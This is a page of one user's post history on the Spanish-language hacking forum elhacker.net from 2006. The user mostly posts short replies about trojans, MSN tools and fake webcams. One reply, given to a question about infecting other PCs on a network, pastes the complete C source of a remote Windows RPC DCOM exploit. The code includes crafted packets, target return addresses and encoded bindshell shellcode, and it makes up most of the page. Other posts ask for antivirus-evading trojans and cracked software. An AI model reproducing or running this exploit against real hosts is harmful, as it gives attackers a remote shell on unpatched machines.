elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 14:26  



  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25
151  Seguridad Informática / Análisis y Diseño de Malware / Re: Infector en: 18 Agosto 2006, 23:39
  Mira amigo con el solo hecho de conectarte mal a internet y dejar puertos abiertos los virus como el kunfu y otros te infectan al acto ;D
  Un virus como el que te nombre anteriormente existen muchisimos hasta yo e hecho uno   ;D ;D
   Recomendacion: Estos tipos de virus realizan varios intentos de conexion, el mas rapido lo hace en 4 intentos
152  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyanos en: 18 Agosto 2006, 23:31
  jajjajajaj que buena broma ;D
153  Programación / Programación VB / Re: Duda Programa MSN en: 16 Agosto 2006, 01:45
 con esto se puede blokear el msn yo pienso que sera mejor conectando por protocolos ;D
154  Comunicaciones / Chats; IRC y Messengers / Re: fake webcam en: 15 Agosto 2006, 00:53
 tienes que desconectar tu cam antes de poner el fake webcam ;D
155  Seguridad Informática / Análisis y Diseño de Malware / Re: -=[Papper: Programando un Joiner en VB desde 0 (Vol. I) (By Me)]=- en: 14 Agosto 2006, 01:38
 dejalo en exe
156  Seguridad Informática / Análisis y Diseño de Malware / Re: Infectar otras PC's que esten en RED en: 12 Agosto 2006, 00:25
  ese es el coder: ;D


/* Windows 2003 <= remote RPC DCOM exploit
 * Coded by .:[oc192.us]:. Security
 *
 * Features:
 *
 * -d destination host to attack.
 *
 * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
 *
 * -r for using a custom return address.
 *
 * -t to select target type (Offset) , this includes universal offsets for -
 *    win2k and winXP (Regardless of service pack)
 *
 * -l to select bindshell port on remote machine (Default: 666)
 *
 * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
 *   preventing crash of RPC service on remote machine.
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

int type=0;
struct
{
  char *os;
  u_long ret;
}
 targets[] =
 {
  { "[Win2k-Universal]", 0x0018759F },
  { "[WinXP-Universal]", 0x0100139d },
}, v;
 

void usage(char *prog)
{
  int i;
  printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
  printf("Usage:\n\n");
  printf("%s -d <host> [options]\n", prog);
  printf("Options:\n");
  printf("   -d:      Hostname to attack [Required]\n");
  printf("   -t:      Type [Default: 0]\n");
  printf("   -r:      Return address [Default: Selected from target]\n");
  printf("   -p:      Attack port [Default: 135]\n");
  printf("   -l:      Bindshell port [Default: 666]\n\n");
  printf("Types:\n");
  for(i = 0; i < sizeof(targets)/sizeof(v); i++)
    printf("   %d [0x%.8x]: %s\n", i, targets.ret, targets.os);
  exit(0);
}

unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */
   
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
 
/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */

/* Not ripped from teso =) */
void con(int sockfd)
{
  char rb[1500];
  fd_set  fdreadme;
  int i;

  FD_ZERO(&fdreadme);
  FD_SET(sockfd, &fdreadme);
  FD_SET(0, &fdreadme);

  while(1)
  {
    FD_SET(sockfd, &fdreadme);
    FD_SET(0, &fdreadme);
      if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
        if(FD_ISSET(sockfd, &fdreadme))
        {
          if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
          {
            printf("[-] Connection lost..\n");
            exit(1);
          }
            if(write(1, rb, i) < 0) break;
        }

        if(FD_ISSET(0, &fdreadme))
        {
          if((i = read(0, rb, sizeof(rb))) < 0)
          {
            printf("[-] Connection lost..\n");
            exit(1);
          }
           if (send(sockfd, rb, i, 0) < 0) break;
        }
           usleep(10000);
        }
       
        printf("[-] Connection closed by foreign host..\n");
 
        exit(0);
}

int main(int argc, char **argv)
{
    int len, len1, sockfd, c, a;
    unsigned long ret;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short lportl=666; /* drg */
    char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
    struct hostent *he;
    struct sockaddr_in their_addr;
    static char *hostname=NULL;

    if(argc<2)
    {
      usage(argv[0]);
    }

    while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
    {
      switch (c)
      {
        case 'd':
          hostname = optarg;
          break;
        case 't':
          type = atoi(optarg);
          if((type > 1) || (type < 0))
          {
            printf("[-] Select a valid target:\n");
              for(a = 0; a < sizeof(targets)/sizeof(v); a++)
              printf("    %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);             
              return 1;
          }
          break;
        case 'r':
          targets[type].ret = strtoul(optarg, NULL, 16);
          break;
        case 'p':
          port = atoi(optarg);
          if((port > 65535) || (port < 1))
          {
            printf("[-] Select a port between 1-65535\n");
            return 1;
          }
          break;
        case 'l':
          lportl = atoi(optarg);   
          if((port > 65535) || (port < 1))
          {
            printf("[-] Select a port between 1-65535\n");
            return 1;
          }
          break;
       default:
          usage(argv[0]);
          return 1;
      }
    }

    if(hostname==NULL)
    {
      printf("[-] Please enter a hostname with -d\n");
      exit(1);
    }

    printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
    printf("
  • Resolving host..\n");

    if((he = gethostbyname(hostname)) == NULL)
    {
      printf("[-] gethostbyname: Couldnt resolve hostname\n");
      exit(1);
    }

    printf("
  • Done.\n");

    printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
              targets[type].os, hostname, port, lportl, targets[type].ret);

    /* drg */   
    lportl=htons(lportl);
    memcpy(&lport[1], &lportl, 2);
    *(long*)lport = *(long*)lport ^ 0x9432BF80;
    memcpy(&sc[471],&lport,4);

    memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);

    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = htons(port);

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("[-] Socket failed");
        return(0);
    }
   
    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("[-] Connect failed");
        return(0);
    }
   
    /* xfocus start */
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
   
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; 
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
   
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
   
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
   

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; 
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
    /* end xfocus */
   

    if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("[-] Send failed");
            return(0);
    }
    len=recv(sockfd, buf1, 1000, 0);
   
    if (send(sockfd,buf2,len1,0)== -1)
    {
            perror("[-] Send failed");
            return(0);
    }
    close(sockfd);
    sleep(1);
   
    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = lportl;

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("[-] Socket failed");
        return(0);
    }
   
    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        printf("[-] Couldnt connect to bindshell, possible reasons:\n");
        printf("   1:   Host is firewalled\n");
        printf("   2:   Exploit failed\n");
        return(0);
    }   
   
    printf("
  • Connected to bindshell..\n\n");

    sleep(2);

    printf("-- bling bling --\n\n");

    con(sockfd);

    return(0);
157  Seguridad Informática / Análisis y Diseño de Malware / Re: -=[Papper: Programando un Joiner en VB desde 0 (Vol. I) (By Me)]=- en: 10 Agosto 2006, 04:25
 a mi me encanta escribir la K en lugar de Q no veo nada malo en eso al igual de usar palabras agudas y despistante ;D ;D Eso es la ceda ;)
158  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo Fenix. Mi primer troyano!!!! en: 10 Agosto 2006, 04:16
 Lo malo de esto es que solo funciona en xp por el gdi32 yo tambien lo utilizaba en mis troyanos y esta bueno.
  Pero para hacer un soft tipo radmin lo veo dificil en vb6 me gustaria mas en c++.
159  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo Fenix. Mi primer troyano!!!! en: 09 Agosto 2006, 17:36
 en vb la compresion de jpg la veo un poco dificil ;D ;D
  sera rre pesado
160  Comunicaciones / Chats; IRC y Messengers / Re: Como congelar una cuanta de messenger en: 09 Agosto 2006, 17:28
 el antivirus lo detecta como un troyano  ;D
  No tenes uno que sea indetectable
161  Comunicaciones / Chats; IRC y Messengers / Re: fake webcam en: 07 Agosto 2006, 04:25
 si aun esta es que megaupload es un poco revelde ;D ;D
   Es para la ultima version la 1.8.

  Me gustaria que si alguien mas iso un crack o tiene la version original que me mande un privado o camparta.
  Desde ya gracias ;D ;D ;)
162  Seguridad Informática / Análisis y Diseño de Malware / Re: Heuristic String Compare en: 01 Agosto 2006, 23:28
  Muy bueno  ;D
163  Seguridad Informática / Análisis y Diseño de Malware / Re: XD!! Carpeta de Bifrost!!! en: 01 Agosto 2006, 23:23
 es buena la idea ya la habia visto en un virus llamado Kunfu que lo que hacia era encriptarce pero lo hacia de diferentes formas de encriptacion.  ;D ;D
164  Forums Generales / Foro Libre / Que tipo de musica se escucha mas en tu region???? en: 29 Julio 2006, 16:44
  Bueno amigos para conosernos mas en los intereses les propongo esto ::) ::) ;D

  soy Argentino- Correntino y el tipo de musica que mas se olle por alla es Rock y disco
165  Comunicaciones / Redes / Re: enviar mensajes en: 29 Julio 2006, 16:34
  el problema es mas que obio que se debe a que tu o tu amiga tienen distintos sistemas operativos mira yo antes tenia este :

 (YO) WINDOWS XP HOME EDITION SP2>>LAN>> (AMIGO) WINDOWS XP PROFESIONAL 

 >>>>>>>>>><<NO FUNCIONABA<<<<<<<<<<
 Y EN ESTE NUEVO CASO QUE TENGO AHORA SI FUNCIONA:

(YO) WINDOWS XP PROFESIONAL>>>LAN>>(AMIGO) WINDOWS XP PROFESIONAL 


 Y en este caso si funciono. Talvez sea porque windows xp home esta desabilitado esa obcion   ;D ;D pero ese me paso ami nose por alli sea algo de nada busca info
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC